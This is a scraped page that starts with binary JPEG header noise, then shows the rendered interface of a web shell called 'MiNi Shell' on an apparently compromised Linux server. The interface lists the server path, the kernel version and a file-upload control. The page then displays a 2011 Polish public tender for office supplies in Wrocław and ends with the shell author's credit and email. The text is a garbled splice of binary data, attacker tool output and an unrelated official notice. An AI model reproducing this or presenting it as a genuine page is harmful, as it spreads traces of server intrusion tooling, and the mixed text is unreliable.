JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110408/70130-N-2011.html

<p class="kh_header"><b>Wrocław: dostawa artykułów biurowych i papierniczych do Dolnośląskiego Oddziału Regionalnego ARiMR we Wrocławiu</b><br>
<b>Numer ogłoszenia: 70130 - 2011; data zamieszczenia: 08.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Dolnośląski Oddział Regionalny , ul. Giełdowa 8, 52-438 Wrocław, woj. dolnośląskie, tel. 071 3697400, faks 071 3643702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa artykułów biurowych i papierniczych do Dolnośląskiego Oddziału Regionalnego ARiMR we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa niżej wymienionych artykułów biurowych i papierniczych do Dolnośląskiego Oddziału Regionalnego ARiMR we Wrocławiu. 

l.p.	Towar	Ilość 	jednostka 
 	 	 	miary
 	1	2	3
 	 	 	 
1	papier  A4 w ryzach 80g m2, CIE 161	3 100	ryza
2	papier A3 w ryzach 80 g m2, CIE 161	20	ryza
3	papier A5 (A4 cięty do formatu A5) 120 g m2 w ryzach 500 (w ryzie paczki po 250 szt. A5)	60	op.
4	teczka tekturowa wiązana A4, biała 300 g m2	30 000	szt.
5	koszulki A4 op. 100 szt. przezroczysta, groszkowa, folia o grubości min. 45 mikronów	100	op.
6	długopis o grubość linii pisania 0,5 mm, długość linii pisania 3000 m; kolor: niebieski (70%), czarny (30%)	2 000	szt.
7	pisak do płyt CD/DVD czarny	50	szt.
8	pisaki / markery ścieralne kolor czarny, okrągła końcówka o śr. 5 mm, grubość linii 2,5 mm 	30	szt.
9	zszywki 24 6 op. 10 op. po 1000 szt.	100	op.
10	uniwersalny marker permanentny - czarny	100	szt.
11	uniwersalny marker permanentny - czerwony	100	szt
12	taśma do pakowania szara/brązowa wym. szer. 48 (mm) x dł. 66 (m)	30	szt.
13	taśma biurowa, przeźroczysta pokryta klejem akrylowym, wymiary szer(mm) x dł (m) 18 x 20	250	szt.
14	klej w sztyfcie 15-21g (wysokiej jakości klej do papieru, tektury; nietoksyczny)	100	szt.
15	korektor paskowy	100	szt.
16	ołówek (op. po 12 szt) wysokiej jakości ołówek biurowy HB, bez gumki	1 000	szt.
17	gumka do ścierania, wykonana z najwyższej jakości termoplastycznego kauczuku, usuwa ołówek nie naruszając struktury papieru, szacunkowe wym.: 3,5 x 1,6 x 1,2 cm	100	szt.
18	karteczki memo małe 40 x 50 mm (op. po 3 szt.)	200	op.
19	karteczki memo duże 75 x 75	300	bl.
20	tusz czarny, pojemność min. 25 ml	30	szt.
21	tusz zielony, pojemność min. 25 ml	100	szt.
22	klips do papieru - 32 mm (op. 12 szt.)	100	op.
23	klips do papieru - duży 51 mm(op.12 szt.)	100	op.
24	rozszywacz - pozwala na łatwe usuwanie zszywek z dokumentów	50	op.
25	cienkopis z końcówką fibrową - czarny, niebieski, zielony, czerwony (op.)	600	szt.
26	spinacz biurowy mały (op. 100 szt.) spinacz owalny/trójkątny, srebrny 25-28 mm	100	op.
27	spinacz biurowy (op. 100 szt.) spinacz owalny/trójkątny, srebrny 50 mm	100	op.
28	nożyczki do cięcia papieru, ostrza ze stali nierdzewnej, rękojeść wyprofilowana dł. 21	50	szt.
29	dziurkacz, jednorazowo dziurkuje min. 25 kartek, wykonany z blachy stalowej, posiada ogranicznik formatu A4, A5, A6, 8x8x8, z pojemnikiem na ścinki	60	szt.
30	zszywacz biurowy na zszywki 24/6 i 26/6, zszywa min. 20 kartek	60	szt.
31	segregator A4 szer. grzbietu 75 mm zielone/czerwone	2 000	szt.
32	segregator A4 szer. grzbietu 50 mm	500	szt.
33	spray czyszczący do monitorów, czyści szyby skanerów, komputerów, ekrany TFT, LCD i laptopów, nie pozostawia smug, posiada właściwości antystatyczne, nie zawiera alkoholu i jest przebadany dermatologicznie; posiada formułę przyjazna środowisku; pojemność min. 250 ml	20	szt.
34	zakładki indeksujące - 4 kolory po 40 karteczek	200	kpl
35	zakreślacz do zaznaczenia tekstu na każdym rodzaju papieru, nietoksyczny tusz o wysokiej trwałości i wydajności, końcówka ścięta 1-5 mm; kolory: żółty zielony, różowy	120	szt.
36	linijka wykonana z przeźroczystego plastiku 30cm	100	szt.
37	wąsy do skoroszytów, op. 25 szt. kolor: czarny, czerwony, zielony, niebieski	100	op.
38	kalkulator nabiurkowy, liczba cyfr na wyświetlaczu: 12; pamięć: pojedyncza, zasilanie: bateria słoneczna, zaokrąglenie wyników, korekta ostatniej cyfry	30	szt
39	odkamieniacz do czajników	50	szt
40	koperta bąbelkowa A5 op. 10 szt.	40	op.
41	koperta bąbelkowa A4 op. 10 szt.	40	op.
42	zeszyt w kratkę A5, 32 kartki	30	szt.
43	zeszyt w kratkę A4 w twardej oprawie	30	szt.
44	deska z klipsem A4	30	szt.
45	przód - okładka do bindowania, krystaliczna wykonana z pcv (op.100 szt.)	7	op.
46	tył -okładka do bindowania kartonowa (op.100 szt.)	7	op.
47	kosz na śmieci wykonany z wytrzymałego metalu, pojemność 12-15l, kolor czarny	20	szt.
48	wkład do pojemnika w kostce, biały, klejony	100	szt.
49	przekładka do segregatora 1/3 A4 op. 100 szt. mix kolorów	10	op.
50	koperta C4 SK op. 250 szt.	100	op.
51	koperta DIN C5 op. 500 szt.	60	op.
52	koperta DIN DLSK okno prawe op. 500 szt.	100	op.
53	koperta C6, op. 1000 szt.	100	op.
54	Zszywacz biurowy, umożliwia zszywanie od 2 do 60 kartek bez konieczności zmiany zszywek	10	szt.
55	temperówka pojedyncza, metalowa	50	szt.
56	nożyk biurowy 9mm	100	szt.
57	nożyk biurowy 18mm	100	szt.
58	pinezki beczułki op. 50 szt.	40	op.
59	klips archiwizacyjny op. 50 szt.	10	op.
60	ścierki tradycyjne	60	szt.
61	teczka prezentacyjna z gumką A4 (zielony, czerwony) wykonana z polipropylenu, 2 narożne gumki	100	szt.
62	magnesy do tablic magnetycznych  op. 6 szt. 	3	op.
63	dziennik korespondencyjny (podawczy) ilość kartek ok. 200	130	szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
1.	działania siły wyższej lub wystąpienia stanu wyższej konieczności,
2.	zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,
3.	zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
4.	omyłek pisarskich lub błędów rachunkowych,
5.	mających na celu wyjaśnienie wątpliwości dotyczących treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
6.	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,
7.	innych zmian korzystnych dla Zamawiającego, w tym polegających na zmianie elementów zamówienia na elementy lepsze lub odpowiedniejsze, chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląski Oddział Regionalny ARiMR, ul. Giełdowa 8, Wrocław 52-438.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.04.2011 godzina 10:00, miejsce: Dolnośląski Oddział Regionalny ARiMR, ul. Giełdowa 8, 52-438 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com